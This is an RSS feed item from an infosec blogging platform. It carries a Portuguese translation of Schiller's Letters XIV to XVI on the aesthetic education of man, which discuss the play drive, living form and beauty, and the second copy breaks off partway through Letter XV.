<?xml version="1.0" encoding="UTF-8"?><rss version="2.0" xmlns:content="http://purl.org/rss/1.0/modules/content/">
  <channel>
    <title>Infosec Press Reader</title>
    <link>https://infosec.press</link>
    <description>Read the latest posts from Infosec Press.</description>
    <pubDate>Sun, 12 Jul 2026 18:10:21 +0000</pubDate>
    <item>
      <title>Impulso Lúdico em Schiller</title>
      <link>https://infosec.press/nomos/impulso-ludico-em-schiller</link>
      <description>&lt;![CDATA[Cartas XIV a XVI, da obra “Sobre a educação estética do homem em uma serie de cartas”, de Friedrich Schiller&#xA;!--more--&#xA;Carta Catorze&#xA;&#xA;A esta altura, fomos conduzidos ao conceito de uma tal ação recíproca entre os dois impulsos, na qual a atividade de um funda e, ao mesmo tempo, limita a atividade do outro, e na qual cada um deles, considerado isoladamente, alcança sua mais alta manifestação precisamente porque o outro está em atividade.&#xA;&#xA;Essa relação recíproca entre os dois impulsos é, contudo, apenas uma tarefa da razão, que o homem só é capaz de resolver plenamente na consumação de sua existência. Ela é, no sentido mais próprio da palavra, a ideia de sua humanidade, portanto um infinito do qual ele pode aproximar-se cada vez mais ao longo do tempo, sem jamais alcançá-lo. Ele não deve aspirar à forma às custas de sua realidade, nem à realidade às custas da forma; antes, deve buscar o ser absoluto por meio de um ser determinado, e o ser determinado por meio de um ser infinito. Deve colocar um mundo diante de si, porque é pessoa, e deve ser pessoa, porque um mundo lhe é apresentado. Deve sentir, porque é consciente de si, e deve ser consciente de si, porque sente.&#xA;&#xA;Que ele corresponda efetivamente a essa ideia e seja, por conseguinte, homem no pleno sentido da palavra, jamais poderá ser objeto de experiência enquanto satisfizer exclusivamente um desses dois impulsos, ou apenas um depois do outro; pois, enquanto apenas sente, sua pessoa, ou sua existência absoluta, permanece oculta para ele; e, enquanto apenas pensa, sua existência no tempo, ou seu estado, permanece igualmente oculta. Se, porém, houvesse casos em que ele realizasse simultaneamente essa dupla experiência, em que se tornasse consciente de sua liberdade ao mesmo tempo que experimentasse sua existência, em que se sentisse simultaneamente como matéria e se conhecesse como espírito, então teria, nesses casos, e somente neles, uma intuição completa de sua humanidade, e o objeto que lhe proporcionasse essa intuição servir-lhe-ia de símbolo de sua destinação realizada e, por conseguinte, já que esta só pode ser alcançada na totalidade do tempo, de representação do infinito.&#xA;&#xA;Supondo que casos dessa natureza possam ocorrer na experiência, eles despertariam no homem um novo impulso que, justamente porque os dois outros atuam conjuntamente nele, se oporia a cada um deles considerado isoladamente e, com razão, poderia ser tomado como um novo impulso. O impulso sensível quer que haja mudança, quer que o tempo tenha um conteúdo; o impulso formal quer que o tempo seja abolido, quer que não haja mudança. O impulso no qual ambos atuam conjuntamente, seja-me permitido, por ora, até que eu tenha justificado essa denominação, chamá-lo de impulso lúdico, o impulso lúdico, portanto, seria orientado para abolir o tempo no próprio tempo, reconciliar o devir com o ser absoluto e a mudança com a identidade.&#xA;&#xA;O impulso sensível quer ser determinado; quer receber seu objeto. O impulso formal quer determinar por si mesmo; quer produzir seu objeto. O impulso lúdico procurará, portanto, receber como se ele próprio tivesse produzido, e produzir como os sentidos aspiram a receber.&#xA;&#xA;O impulso sensível exclui de seu sujeito toda atividade própria e toda liberdade; o impulso formal exclui do seu toda dependência e toda passividade. Mas a exclusão da liberdade é necessidade física, e a exclusão da passividade é necessidade moral. Ambos os impulsos constrangem, portanto, o ânimo, aquele por meio das leis da natureza, este por meio das leis da razão. O impulso lúdico, no qual ambos atuam conjuntamente, constrangerá o ânimo ao mesmo tempo moral e fisicamente; portanto, justamente porque suprime toda contingência, suprimirá também toda coerção e colocará o homem em liberdade tanto física quanto moral. Quando abraçamos apaixonadamente alguém que é digno de nosso desprezo, sentimos dolorosamente a coerção da natureza. Quando somos hostis a alguém que nos impõe respeito, sentimos dolorosamente a coerção da razão. Mas, tão logo esse mesmo indivíduo desperta nossa inclinação e conquista nosso respeito, desaparecem tanto a coerção da sensibilidade quanto a coerção da razão, e começamos a amá-lo, isto é, começamos a jogar simultaneamente com nossa inclinação e com nosso respeito.&#xA;&#xA;Além disso, como o impulso sensível nos constrange fisicamente e o impulso formal moralmente, aquele torna contingente nossa condição formal, e este nossa condição material; isto é, é contingente que nossa felicidade esteja de acordo com nossa perfeição, ou que esta esteja de acordo com aquela. O impulso lúdico, no qual ambos atuam unidos, tornará simultaneamente contingentes nossa condição formal e nossa condição material, nossa perfeição e nossa felicidade; portanto, precisamente porque torna ambas contingentes, e porque, com a necessidade, desaparece também a contingência, abolirá novamente a contingência em ambas e introduzirá forma na matéria e realidade na forma. Na mesma medida em que retira das sensações e dos afetos sua influência dinâmica, ele os colocará em concordância com as ideias da razão; e, na mesma medida em que retira das leis da razão sua coerção moral, reconciliá-las-á com o interesse dos sentidos.&#xA;&#xA;Carta Quinze&#xA;&#xA;Aproximo-me cada vez mais da meta para a qual o conduzo por um caminho pouco animador. Permita-me apenas que o senhor me acompanhe por mais alguns passos, e um horizonte tanto mais amplo se abrirá diante de nós, enquanto uma perspectiva mais luminosa talvez recompense o esforço do caminho.&#xA;&#xA;O objeto do impulso sensível, expresso em um conceito geral, chama-se vida, no sentido mais amplo da palavra; um conceito que designa todo ser material e toda presença imediata aos sentidos. O objeto do impulso formal, expresso em um conceito geral, chama-se forma, tanto em sentido próprio quanto em sentido figurado; um conceito que compreende todas as determinações formais das coisas e todas as relações destas com as faculdades do pensamento. O objeto do impulso lúdico, representado por um esquema geral, poderá, portanto, chamar-se forma viva; um conceito que serve para designar todas as qualidades estéticas dos fenômenos e, em uma palavra, aquilo que, no sentido mais amplo, se denomina beleza.&#xA;&#xA;Por meio dessa explicação, se é que se trata realmente de uma explicação, a beleza não é estendida a todo o domínio do que é vivo, nem tampouco encerrada exclusivamente nesse domínio. Um bloco de mármore, embora seja e permaneça inanimado, pode, ainda assim, tornar-se forma viva pelas mãos do arquiteto e do escultor; um homem, embora viva e possua forma, está ainda longe, por isso só, de ser uma forma viva. Para isso, é necessário que sua forma seja vida e que sua vida seja forma. Enquanto apenas pensamos sua forma, ela permanece sem vida, uma simples abstração; enquanto apenas sentimos sua vida, ela permanece sem forma, uma simples impressão. Somente quando sua forma vive em nossa sensibilidade e sua vida adquire forma em nosso entendimento é que ele é forma viva, e isso ocorrerá sempre que o julgarmos belo.&#xA;&#xA;Mas o fato de sabermos indicar os elementos cuja união produz a beleza não explica, de modo algum, sua gênese; para isso seria necessário compreender essa própria união, que permanece para nós insondável, assim como, de modo geral, toda interação entre o finito e o infinito. A razão formula, por fundamentos transcendentais, a exigência de que haja uma comunhão entre o impulso formal e o impulso sensível, isto é, um impulso lúdico, porque somente a unidade da realidade com a forma, da contingência com a necessidade, da passividade com a liberdade completa o conceito de humanidade. Ela deve formular essa exigência porque é razão, porque, por sua própria natureza, tende à perfeição e à remoção de todos os limites, ao passo que toda atividade exclusiva de um ou de outro impulso deixa incompleta a natureza humana e nela estabelece uma limitação. Assim, no mesmo instante em que enuncia: deve existir uma humanidade, estabelece igualmente esta lei: deve existir uma beleza. A experiência pode responder-nos se existe uma beleza, e nós o saberemos assim que ela nos tiver mostrado se existe uma humanidade. Mas nem a razão nem a experiência podem ensinar-nos como a beleza é possível, nem como a humanidade pode sê-lo.&#xA;&#xA;Sabemos que o homem não é exclusivamente matéria nem exclusivamente espírito. A beleza, como consumação de sua humanidade, não pode, portanto, ser exclusivamente vida, como sustentaram observadores argutos que se apegaram demasiado ao testemunho da experiência, e para onde o gosto da época gostaria de reduzi-la; tampouco pode ser exclusivamente forma, como julgaram filósofos especulativos que demasiado se afastaram da experiência e artistas filósofos que, ao explicá-la, se deixaram conduzir em excesso pelas exigências da arte. Ela é o objeto comum de ambos os impulsos, isto é, do impulso lúdico. O próprio uso da linguagem justifica plenamente esse nome, pois costuma designar pela palavra jogo tudo aquilo que não é contingente nem subjetiva nem objetivamente e que, apesar disso, não constrange nem exterior nem interiormente. Como o ânimo, na contemplação do belo, se encontra em um feliz ponto de equilíbrio entre a lei e a necessidade, é justamente porque participa de ambas que se vê livre da coerção tanto de uma quanto da outra. Tanto o impulso sensível quanto o impulso formal levam suas exigências a sério, porque o primeiro, no conhecimento, refere-se à realidade, enquanto o segundo se refere à necessidade das coisas; porque, na ação, o primeiro visa à conservação da vida e o segundo à preservação da dignidade, estando ambos, portanto, orientados para a verdade e para a perfeição. Mas a vida perde sua gravidade quando a dignidade intervém, e o dever deixa de constranger quando a inclinação o acompanha; do mesmo modo, o ânimo acolhe a realidade das coisas, a verdade material, com maior liberdade e serenidade quando esta se encontra com a verdade formal, a lei da necessidade, e deixa de sentir-se tensionado pela abstração quando esta pode ser acompanhada pela intuição imediata. Em uma palavra: quando entra em comunhão com as ideias, tudo o que é real perde sua gravidade, porque se torna pequeno; e quando encontra a sensibilidade, o necessário perde igualmente a sua, porque se torna leve.&#xA;&#xA;Mas, talvez o senhor já estivesse inclinado a objetar-me há algum tempo, não é a beleza rebaixada ao ser transformada em mero jogo e equiparada aos objetos frívolos que desde sempre receberam esse nome? Não contraria isso o conceito racional e a dignidade da beleza, que é considerada um instrumento da cultura, reduzi-la a um mero jogo? E não contraria também o conceito empírico de jogo, que pode muito bem existir sem qualquer participação do gosto, restringi-lo exclusivamente à beleza?&#xA;&#xA;Contudo, o que significa um mero jogo, depois que sabemos que, entre todos os estados do homem, é precisamente o jogo, e somente o jogo, aquilo que o torna completo e faz desabrochar de uma só vez sua dupla natureza? Aquilo que o senhor, segundo sua concepção da questão, chama de limitação, eu, segundo a minha, que creio ter justificado por meio de argumentos, chamo de ampliação. Eu diria, portanto, exatamente o contrário: diante do agradável, do bom e do perfeito, o homem é sério; mas é com a beleza que ele joga. Certamente, não devemos pensar aqui nos jogos que se praticam na vida real e que, em geral, se dirigem apenas a objetos muito materiais; mas também seria em vão que procurássemos, na vida real, a beleza de que aqui se trata. A beleza efetivamente existente é digna do impulso lúdico efetivamente existente; mas o ideal de beleza, que a razão estabelece, propõe igualmente um ideal do impulso lúdico, que o homem deve ter diante dos olhos em todos os seus jogos.&#xA;&#xA;Jamais nos enganaremos se procurarmos o ideal de beleza de um povo pelo mesmo caminho em que ele satisfaz seu impulso lúdico. Se os povos gregos encontravam prazer, nos jogos olímpicos, nas competições incruentas de força, de velocidade e de agilidade, bem como na mais nobre disputa dos talentos, e se o povo romano se deleitava com o combate mortal de um gladiador abatido ou de seu adversário líbio, então esse único traço basta para compreendermos por que devemos procurar as figuras ideais de uma Vênus, de uma Juno e de um Apolo não em Roma, mas na Grécia. A razão, porém, afirma: o belo não deve ser mera vida nem mera forma, mas forma viva, isto é, beleza, pois ela prescreve ao homem a dupla lei da formalidade absoluta e da realidade absoluta. Consequentemente, ela também enuncia: o homem deve jogar apenas com a beleza, e deve jogar somente com a beleza.&#xA;&#xA;Pois, para dizê-lo enfim de uma vez por todas, o homem só joga quando é homem no pleno sentido da palavra, e só é plenamente homem quando joga. Esta proposição, que neste momento talvez pareça paradoxal, adquirirá um significado grande e profundo quando chegarmos a aplicá-la ao duplo rigor do dever e do destino; ela sustentará, eu lhes asseguro, todo o edifício da arte estética e da arte, ainda mais difícil, de viver. Mas essa proposição é inesperada apenas para a ciência; há muito tempo ela já vivia e atuava na arte e no sentimento dos gregos, seus mais eminentes mestres; apenas transportaram para o Olimpo aquilo que deveria realizar-se na Terra. Guiados pela verdade desse princípio, fizeram desaparecer da fronte dos deuses bem-aventurados tanto a seriedade e o trabalho, que sulcam o rosto dos mortais, quanto o prazer vão, que alisa o semblante vazio; libertaram os eternamente satisfeitos das cadeias de todo propósito, de todo dever e de toda preocupação, e fizeram da ociosidade e da indiferença a condição invejada dos deuses, um nome simplesmente mais humano para o ser mais livre e mais sublime. Tanto a coerção material das leis da natureza quanto a coerção espiritual das leis morais dissolviam-se em seu conceito mais elevado de necessidade, que abrangia simultaneamente ambos os mundos, e foi da unidade dessas duas necessidades que lhes surgiu, pela primeira vez, a verdadeira liberdade. Animados por esse espírito, apagaram dos traços de seu ideal, juntamente com a inclinação, também todos os vestígios da vontade, ou, melhor dizendo, tornaram ambas irreconhecíveis, porque souberam uni-las no vínculo mais íntimo. Não é a graça, nem a dignidade, aquilo que nos fala do magnífico semblante de uma Juno Ludovisi; não é nenhuma das duas, porque é ambas ao mesmo tempo. Enquanto o deus feminino exige nossa adoração, a mulher semelhante a uma deusa desperta nosso amor; mas, enquanto nos entregamos, inteiramente abandonados, ao encanto celeste, a autossuficiência divina nos faz recuar. Toda a figura repousa e habita em si mesma, uma criação completamente fechada, como se estivesse para além do espaço, sem ceder, sem oferecer resistência; ali não há força que combata outras forças, nem brecha por onde a temporalidade possa irromper. Irresistivelmente arrebatados e atraídos por um aspecto, mantidos à distância pelo outro, encontramo-nos ao mesmo tempo no estado do mais alto repouso e do mais alto movimento, e nasce aquela maravilhosa comoção para a qual o entendimento não possui conceito e a linguagem não possui nome.&#xA;&#xA;Carta Dezesseis&#xA;&#xA;Da ação recíproca entre dois impulsos opostos e da união entre dois princípios opostos vimos surgir o belo, cujo mais alto ideal deverá, portanto, ser buscado na união e no equilíbrio mais perfeitos possíveis entre a realidade e a forma. Esse equilíbrio, porém, permanece sempre apenas uma ideia, que jamais pode ser plenamente alcançada na realidade. Na realidade, sempre subsistirá uma predominância de um dos elementos sobre o outro, e o máximo que a experiência pode oferecer consistirá em uma oscilação entre ambos os princípios, na qual ora predomina a realidade, ora a forma. A beleza na ideia é, portanto, eternamente una e indivisível, porque só pode haver um único equilíbrio; a beleza na experiência, ao contrário, será eternamente dupla, porque, em uma oscilação, o equilíbrio pode ser ultrapassado de duas maneiras, para um lado ou para o outro.&#xA;&#xA;Observei em uma das cartas anteriores, e isso também pode ser rigorosamente deduzido da sequência do que foi exposto até aqui, que do belo se deve esperar, ao mesmo tempo, um efeito relaxante e um efeito tensionante: um efeito relaxante, para manter tanto o impulso sensível quanto o impulso formal dentro de seus limites; um efeito tensionante, para conservar ambos em toda a sua força. Segundo a ideia, porém, esses dois modos de ação da beleza devem constituir rigorosamente um único e mesmo efeito. Ela deve relaxar precisamente porque tensiona igualmente ambas as naturezas, e deve tensionar precisamente porque relaxa igualmente ambas as naturezas. Isso decorre já do próprio conceito de ação recíproca, segundo o qual ambas as partes se condicionam necessariamente uma à outra e são condicionadas uma pela outra, e cujo produto mais puro é a beleza. A experiência, entretanto, não nos oferece nenhum exemplo de uma ação recíproca tão perfeita; nela, sempre, em maior ou menor grau, uma predominância dará origem a uma deficiência, e a deficiência, por sua vez, a uma predominância. Assim, aquilo que, na beleza ideal, se distingue apenas no pensamento, na beleza da experiência apresenta-se como uma diferença real. A beleza ideal, embora indivisível e simples, manifesta, conforme a perspectiva, tanto uma propriedade relaxante quanto uma propriedade tensionante; na experiência, porém, existe uma beleza relaxante e uma beleza tensionante. Assim é, e assim será sempre, em todos os casos em que o absoluto é colocado dentro dos limites do tempo e as ideias da razão devem realizar-se na humanidade. Assim o homem reflexivo concebe a virtude, a verdade e a felicidade; mas o homem que age pratica apenas virtudes, apreende apenas verdades e desfruta apenas dias felizes. Reconduzir estas àquelas, substituir os costumes pela moralidade, os conhecimentos pelo conhecimento e a felicidade pela felicidade plena, é a tarefa da formação física e moral; fazer das belezas a beleza é a tarefa da formação estética.&#xA;&#xA;A beleza tensionante é tão incapaz de preservar o homem de um certo resquício de selvageria e dureza quanto a beleza relaxante o é de protegê-lo de um certo grau de moleza e enfraquecimento. Pois, como o efeito da primeira consiste em tensionar o ânimo tanto física quanto moralmente e aumentar sua força de reação, acontece com demasiada facilidade que a resistência do temperamento e do caráter diminua a receptividade às impressões; que também a humanidade mais delicada sofra uma repressão que deveria atingir apenas a natureza bruta; e que esta participe de um acréscimo de força que deveria pertencer somente à pessoa livre. Por isso encontramos, nas épocas de vigor e de abundância, a verdadeira grandeza da imaginação associada ao gigantesco e ao aventureiro, e a elevação das disposições morais unida às mais terríveis explosões da paixão; por isso veremos, nas épocas da regra e da forma, a natureza ser reprimida com a mesma frequência com que é dominada, e ofendida com a mesma frequência com que é superada.&#xA;&#xA;E, como o efeito da beleza relaxante consiste em relaxar o ânimo tanto moral quanto fisicamente, acontece com igual facilidade que, juntamente com a violência dos desejos, também a energia dos sentimentos seja sufocada, e que o próprio caráter compartilhe de uma perda de vigor que deveria atingir apenas a paixão. Por isso veremos, nas chamadas épocas refinadas, a delicadeza degenerar, não raramente, em moleza, a simplicidade em superficialidade, a correção em vazio, a liberalidade em arbitrariedade, a leveza em frivolidade e a tranquilidade em apatia, e veremos a mais desprezível caricatura confinar imediatamente com a mais elevada humanidade. Para o homem submetido ao jugo da matéria ou das formas, a beleza relaxante é uma necessidade, pois ele é tocado pela grandeza e pela força muito antes de se tornar sensível à harmonia e à graça. Para o homem entregue à indulgência do gosto, a beleza tensionante é uma necessidade, pois ele perde, com excessiva facilidade, no estado de refinamento, a força que trouxe consigo do estado de selvageria.&#xA;&#xA;Creio agora ter explicado e resolvido aquela contradição que frequentemente se encontra nos juízos dos homens acerca da influência do belo e na apreciação da formação estética. Essa contradição se explica tão logo nos recordemos de que, na experiência, existem duas espécies de beleza, e que cada uma das partes atribui ao gênero inteiro apenas aquilo que é capaz de demonstrar de uma de suas espécies particulares. Essa contradição desaparece tão logo distinguimos a dupla necessidade da humanidade, à qual corresponde essa dupla beleza. Assim, é provável que ambas as partes tenham razão, desde que primeiro se entendam sobre qual espécie de beleza e qual forma de humanidade têm em mente.&#xA;&#xA;Prosseguindo, portanto, em minhas investigações, adotarei também como meu o caminho que a natureza segue com o homem do ponto de vista estético e me elevarei das espécies de beleza ao conceito geral da beleza. Examinarei os efeitos da beleza relaxante sobre o homem tensionado e os efeitos da beleza tensionante sobre o homem distendido, para, por fim, dissolver essas duas espécies opostas de beleza na unidade da beleza ideal, assim como aquelas duas formas opostas de humanidade desaparecem na unidade do homem ideal.]]&gt;</description>
      <content:encoded><![CDATA[<p>Cartas XIV a XVI, da obra “Sobre a educação estética do homem em uma serie de cartas”, de Friedrich Schiller
</p>

<h3 id="carta-catorze">Carta Catorze</h3>

<p>A esta altura, fomos conduzidos ao conceito de uma tal ação recíproca entre os dois impulsos, na qual a atividade de um funda e, ao mesmo tempo, limita a atividade do outro, e na qual cada um deles, considerado isoladamente, alcança sua mais alta manifestação precisamente porque o outro está em atividade.</p>

<p>Essa relação recíproca entre os dois impulsos é, contudo, apenas uma tarefa da razão, que o homem só é capaz de resolver plenamente na consumação de sua existência. Ela é, no sentido mais próprio da palavra, a ideia de sua humanidade, portanto um infinito do qual ele pode aproximar-se cada vez mais ao longo do tempo, sem jamais alcançá-lo. Ele não deve aspirar à forma às custas de sua realidade, nem à realidade às custas da forma; antes, deve buscar o ser absoluto por meio de um ser determinado, e o ser determinado por meio de um ser infinito. Deve colocar um mundo diante de si, porque é pessoa, e deve ser pessoa, porque um mundo lhe é apresentado. Deve sentir, porque é consciente de si, e deve ser consciente de si, porque sente.</p>

<p>Que ele corresponda efetivamente a essa ideia e seja, por conseguinte, homem no pleno sentido da palavra, jamais poderá ser objeto de experiência enquanto satisfizer exclusivamente um desses dois impulsos, ou apenas um depois do outro; pois, enquanto apenas sente, sua pessoa, ou sua existência absoluta, permanece oculta para ele; e, enquanto apenas pensa, sua existência no tempo, ou seu estado, permanece igualmente oculta. Se, porém, houvesse casos em que ele realizasse simultaneamente essa dupla experiência, em que se tornasse consciente de sua liberdade ao mesmo tempo que experimentasse sua existência, em que se sentisse simultaneamente como matéria e se conhecesse como espírito, então teria, nesses casos, e somente neles, uma intuição completa de sua humanidade, e o objeto que lhe proporcionasse essa intuição servir-lhe-ia de símbolo de sua destinação realizada e, por conseguinte, já que esta só pode ser alcançada na totalidade do tempo, de representação do infinito.</p>

<p>Supondo que casos dessa natureza possam ocorrer na experiência, eles despertariam no homem um novo impulso que, justamente porque os dois outros atuam conjuntamente nele, se oporia a cada um deles considerado isoladamente e, com razão, poderia ser tomado como um novo impulso. O impulso sensível quer que haja mudança, quer que o tempo tenha um conteúdo; o impulso formal quer que o tempo seja abolido, quer que não haja mudança. O impulso no qual ambos atuam conjuntamente, seja-me permitido, por ora, até que eu tenha justificado essa denominação, chamá-lo de impulso lúdico, o impulso lúdico, portanto, seria orientado para abolir o tempo no próprio tempo, reconciliar o devir com o ser absoluto e a mudança com a identidade.</p>

<p>O impulso sensível quer ser determinado; quer receber seu objeto. O impulso formal quer determinar por si mesmo; quer produzir seu objeto. O impulso lúdico procurará, portanto, receber como se ele próprio tivesse produzido, e produzir como os sentidos aspiram a receber.</p>

<p>O impulso sensível exclui de seu sujeito toda atividade própria e toda liberdade; o impulso formal exclui do seu toda dependência e toda passividade. Mas a exclusão da liberdade é necessidade física, e a exclusão da passividade é necessidade moral. Ambos os impulsos constrangem, portanto, o ânimo, aquele por meio das leis da natureza, este por meio das leis da razão. O impulso lúdico, no qual ambos atuam conjuntamente, constrangerá o ânimo ao mesmo tempo moral e fisicamente; portanto, justamente porque suprime toda contingência, suprimirá também toda coerção e colocará o homem em liberdade tanto física quanto moral. Quando abraçamos apaixonadamente alguém que é digno de nosso desprezo, sentimos dolorosamente a coerção da natureza. Quando somos hostis a alguém que nos impõe respeito, sentimos dolorosamente a coerção da razão. Mas, tão logo esse mesmo indivíduo desperta nossa inclinação e conquista nosso respeito, desaparecem tanto a coerção da sensibilidade quanto a coerção da razão, e começamos a amá-lo, isto é, começamos a jogar simultaneamente com nossa inclinação e com nosso respeito.</p>

<p>Além disso, como o impulso sensível nos constrange fisicamente e o impulso formal moralmente, aquele torna contingente nossa condição formal, e este nossa condição material; isto é, é contingente que nossa felicidade esteja de acordo com nossa perfeição, ou que esta esteja de acordo com aquela. O impulso lúdico, no qual ambos atuam unidos, tornará simultaneamente contingentes nossa condição formal e nossa condição material, nossa perfeição e nossa felicidade; portanto, precisamente porque torna ambas contingentes, e porque, com a necessidade, desaparece também a contingência, abolirá novamente a contingência em ambas e introduzirá forma na matéria e realidade na forma. Na mesma medida em que retira das sensações e dos afetos sua influência dinâmica, ele os colocará em concordância com as ideias da razão; e, na mesma medida em que retira das leis da razão sua coerção moral, reconciliá-las-á com o interesse dos sentidos.</p>

<h3 id="carta-quinze">Carta Quinze</h3>

<p>Aproximo-me cada vez mais da meta para a qual o conduzo por um caminho pouco animador. Permita-me apenas que o senhor me acompanhe por mais alguns passos, e um horizonte tanto mais amplo se abrirá diante de nós, enquanto uma perspectiva mais luminosa talvez recompense o esforço do caminho.</p>

<p>O objeto do impulso sensível, expresso em um conceito geral, chama-se vida, no sentido mais amplo da palavra; um conceito que designa todo ser material e toda presença imediata aos sentidos. O objeto do impulso formal, expresso em um conceito geral, chama-se forma, tanto em sentido próprio quanto em sentido figurado; um conceito que compreende todas as determinações formais das coisas e todas as relações destas com as faculdades do pensamento. O objeto do impulso lúdico, representado por um esquema geral, poderá, portanto, chamar-se forma viva; um conceito que serve para designar todas as qualidades estéticas dos fenômenos e, em uma palavra, aquilo que, no sentido mais amplo, se denomina beleza.</p>

<p>Por meio dessa explicação, se é que se trata realmente de uma explicação, a beleza não é estendida a todo o domínio do que é vivo, nem tampouco encerrada exclusivamente nesse domínio. Um bloco de mármore, embora seja e permaneça inanimado, pode, ainda assim, tornar-se forma viva pelas mãos do arquiteto e do escultor; um homem, embora viva e possua forma, está ainda longe, por isso só, de ser uma forma viva. Para isso, é necessário que sua forma seja vida e que sua vida seja forma. Enquanto apenas pensamos sua forma, ela permanece sem vida, uma simples abstração; enquanto apenas sentimos sua vida, ela permanece sem forma, uma simples impressão. Somente quando sua forma vive em nossa sensibilidade e sua vida adquire forma em nosso entendimento é que ele é forma viva, e isso ocorrerá sempre que o julgarmos belo.</p>

<p>Mas o fato de sabermos indicar os elementos cuja união produz a beleza não explica, de modo algum, sua gênese; para isso seria necessário compreender essa própria união, que permanece para nós insondável, assim como, de modo geral, toda interação entre o finito e o infinito. A razão formula, por fundamentos transcendentais, a exigência de que haja uma comunhão entre o impulso formal e o impulso sensível, isto é, um impulso lúdico, porque somente a unidade da realidade com a forma, da contingência com a necessidade, da passividade com a liberdade completa o conceito de humanidade. Ela deve formular essa exigência porque é razão, porque, por sua própria natureza, tende à perfeição e à remoção de todos os limites, ao passo que toda atividade exclusiva de um ou de outro impulso deixa incompleta a natureza humana e nela estabelece uma limitação. Assim, no mesmo instante em que enuncia: deve existir uma humanidade, estabelece igualmente esta lei: deve existir uma beleza. A experiência pode responder-nos se existe uma beleza, e nós o saberemos assim que ela nos tiver mostrado se existe uma humanidade. Mas nem a razão nem a experiência podem ensinar-nos como a beleza é possível, nem como a humanidade pode sê-lo.</p>

<p>Sabemos que o homem não é exclusivamente matéria nem exclusivamente espírito. A beleza, como consumação de sua humanidade, não pode, portanto, ser exclusivamente vida, como sustentaram observadores argutos que se apegaram demasiado ao testemunho da experiência, e para onde o gosto da época gostaria de reduzi-la; tampouco pode ser exclusivamente forma, como julgaram filósofos especulativos que demasiado se afastaram da experiência e artistas filósofos que, ao explicá-la, se deixaram conduzir em excesso pelas exigências da arte. Ela é o objeto comum de ambos os impulsos, isto é, do impulso lúdico. O próprio uso da linguagem justifica plenamente esse nome, pois costuma designar pela palavra jogo tudo aquilo que não é contingente nem subjetiva nem objetivamente e que, apesar disso, não constrange nem exterior nem interiormente. Como o ânimo, na contemplação do belo, se encontra em um feliz ponto de equilíbrio entre a lei e a necessidade, é justamente porque participa de ambas que se vê livre da coerção tanto de uma quanto da outra. Tanto o impulso sensível quanto o impulso formal levam suas exigências a sério, porque o primeiro, no conhecimento, refere-se à realidade, enquanto o segundo se refere à necessidade das coisas; porque, na ação, o primeiro visa à conservação da vida e o segundo à preservação da dignidade, estando ambos, portanto, orientados para a verdade e para a perfeição. Mas a vida perde sua gravidade quando a dignidade intervém, e o dever deixa de constranger quando a inclinação o acompanha; do mesmo modo, o ânimo acolhe a realidade das coisas, a verdade material, com maior liberdade e serenidade quando esta se encontra com a verdade formal, a lei da necessidade, e deixa de sentir-se tensionado pela abstração quando esta pode ser acompanhada pela intuição imediata. Em uma palavra: quando entra em comunhão com as ideias, tudo o que é real perde sua gravidade, porque se torna pequeno; e quando encontra a sensibilidade, o necessário perde igualmente a sua, porque se torna leve.</p>

<p>Mas, talvez o senhor já estivesse inclinado a objetar-me há algum tempo, não é a beleza rebaixada ao ser transformada em mero jogo e equiparada aos objetos frívolos que desde sempre receberam esse nome? Não contraria isso o conceito racional e a dignidade da beleza, que é considerada um instrumento da cultura, reduzi-la a um mero jogo? E não contraria também o conceito empírico de jogo, que pode muito bem existir sem qualquer participação do gosto, restringi-lo exclusivamente à beleza?</p>

<p>Contudo, o que significa um mero jogo, depois que sabemos que, entre todos os estados do homem, é precisamente o jogo, e somente o jogo, aquilo que o torna completo e faz desabrochar de uma só vez sua dupla natureza? Aquilo que o senhor, segundo sua concepção da questão, chama de limitação, eu, segundo a minha, que creio ter justificado por meio de argumentos, chamo de ampliação. Eu diria, portanto, exatamente o contrário: diante do agradável, do bom e do perfeito, o homem é sério; mas é com a beleza que ele joga. Certamente, não devemos pensar aqui nos jogos que se praticam na vida real e que, em geral, se dirigem apenas a objetos muito materiais; mas também seria em vão que procurássemos, na vida real, a beleza de que aqui se trata. A beleza efetivamente existente é digna do impulso lúdico efetivamente existente; mas o ideal de beleza, que a razão estabelece, propõe igualmente um ideal do impulso lúdico, que o homem deve ter diante dos olhos em todos os seus jogos.</p>

<p>Jamais nos enganaremos se procurarmos o ideal de beleza de um povo pelo mesmo caminho em que ele satisfaz seu impulso lúdico. Se os povos gregos encontravam prazer, nos jogos olímpicos, nas competições incruentas de força, de velocidade e de agilidade, bem como na mais nobre disputa dos talentos, e se o povo romano se deleitava com o combate mortal de um gladiador abatido ou de seu adversário líbio, então esse único traço basta para compreendermos por que devemos procurar as figuras ideais de uma Vênus, de uma Juno e de um Apolo não em Roma, mas na Grécia. A razão, porém, afirma: o belo não deve ser mera vida nem mera forma, mas forma viva, isto é, beleza, pois ela prescreve ao homem a dupla lei da formalidade absoluta e da realidade absoluta. Consequentemente, ela também enuncia: o homem deve jogar apenas com a beleza, e deve jogar somente com a beleza.</p>

<p>Pois, para dizê-lo enfim de uma vez por todas, o homem só joga quando é homem no pleno sentido da palavra, e só é plenamente homem quando joga. Esta proposição, que neste momento talvez pareça paradoxal, adquirirá um significado grande e profundo quando chegarmos a aplicá-la ao duplo rigor do dever e do destino; ela sustentará, eu lhes asseguro, todo o edifício da arte estética e da arte, ainda mais difícil, de viver. Mas essa proposição é inesperada apenas para a ciência; há muito tempo ela já vivia e atuava na arte e no sentimento dos gregos, seus mais eminentes mestres; apenas transportaram para o Olimpo aquilo que deveria realizar-se na Terra. Guiados pela verdade desse princípio, fizeram desaparecer da fronte dos deuses bem-aventurados tanto a seriedade e o trabalho, que sulcam o rosto dos mortais, quanto o prazer vão, que alisa o semblante vazio; libertaram os eternamente satisfeitos das cadeias de todo propósito, de todo dever e de toda preocupação, e fizeram da ociosidade e da indiferença a condição invejada dos deuses, um nome simplesmente mais humano para o ser mais livre e mais sublime. Tanto a coerção material das leis da natureza quanto a coerção espiritual das leis morais dissolviam-se em seu conceito mais elevado de necessidade, que abrangia simultaneamente ambos os mundos, e foi da unidade dessas duas necessidades que lhes surgiu, pela primeira vez, a verdadeira liberdade. Animados por esse espírito, apagaram dos traços de seu ideal, juntamente com a inclinação, também todos os vestígios da vontade, ou, melhor dizendo, tornaram ambas irreconhecíveis, porque souberam uni-las no vínculo mais íntimo. Não é a graça, nem a dignidade, aquilo que nos fala do magnífico semblante de uma Juno Ludovisi; não é nenhuma das duas, porque é ambas ao mesmo tempo. Enquanto o deus feminino exige nossa adoração, a mulher semelhante a uma deusa desperta nosso amor; mas, enquanto nos entregamos, inteiramente abandonados, ao encanto celeste, a autossuficiência divina nos faz recuar. Toda a figura repousa e habita em si mesma, uma criação completamente 